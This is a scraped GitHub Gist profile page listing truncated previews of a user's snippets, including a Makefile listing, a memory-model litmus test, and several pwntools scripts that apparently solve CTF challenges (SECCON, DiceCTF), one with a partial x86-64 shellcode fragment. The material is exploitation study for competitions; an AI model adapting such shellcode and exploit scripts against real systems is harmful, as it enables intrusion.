Skip to content

Instantly share code, notes, and snippets.

View dfyz's full-sized avatar

Ivan Komarov dfyz

View GitHub Profile
@dfyz
dfyz / bad.txt
Created February 9, 2024 03:18
Busytex AR shenanigans
View bad.txt
native/texlive/libs/potrace/Makefile:AR = ar
native/texlive/libs/gmp/Makefile:AR = ar
native/texlive/libs/libpng/Makefile:AR = ar
native/texlive/libs/pixman/Makefile:AR = ar
native/texlive/libs/harfbuzz/Makefile:AR = ar
native/texlive/libs/zziplib/Makefile:AR = ar
native/texlive/libs/teckit/Makefile:AR = ar
native/texlive/libs/gd/Makefile:AR = ar
native/texlive/libs/cairo/Makefile:AR = ar
native/texlive/libs/zlib/Makefile:AR = ar
View blackout.py
from pwn import *
import string
PROMPT = b'> '
def main():
with remote('blackout.seccon.games', 9999) as tube:
@dfyz
dfyz / brute.cpp
Created September 13, 2023 23:10
View brute.cpp
/***
* Instructions:
*
* Just code everything in C, and add __device__ before every memory and func
* that should be accessible on GPU :)
*
* Test on GCC without GPU, just forks:
* gcc -x c -O3 -march=native -o brut brut.cu ; time ./brut 147db93f3e45f64:952781782a15ae6e
*
* CUDA prod:
View shellcoder.py
from pwn import *
# padding; push 0; ret
TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little')
PROMPT = b': '
SHELLCODE = r'''
xor eax, eax
xor rdx, rdx
xor rsi, rsi
@dfyz
dfyz / RB.litmus
Last active May 7, 2023 18:51
Modeling incorrect SPSC ring buffer
View RB.litmus
AArch64 RB.correct
"
Theoretical results:
States 2
1:X6=0; 1:X9=61;
1:X6=1; 1:X9=41;
"
{
0:X3=x; 0:X4=y; 0:X5=z;
1:X3=x; 1:X4=y; 1:X5=z;
View mask_ptr.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/random.h>
#include <unistd.h>
View and with bitmasks
aarch64 (8 bytes)
00 88 74 92 and x0, x0, #0x7ffffffff000
c0 03 5f d6 ret
riscv64 (10 bytes)
b7 05 00 e0 lui a1 0xe0000
c5 81 c.srli a1 0x11
6d 8d c.and a0 a1
82 80 c.jr ra
View flip_jump_2.py
#!/usr/bin/python3
from pwn import *
def p64(n):
return struct.pack("<Q", n)
def gen_xorbyte(byteoffset, value, bitwidth, selfstart, jumpthen):
code = b""
for i in range(bitwidth):
if value & (1 << i):
@dfyz
dfyz / sice_supervisor.py
Created February 5, 2023 20:59
An attempt to solve Sice Supervisor from DiceCTF 2023, which almost succeeded
View sice_supervisor.py
from pwn import *
PROMPT = b'> '
DONE = b'Done!\n'
if __name__ == '__main__':
with process('./sice_supervisor') as tube:
#with remote('mc.ax', 30283) as tube: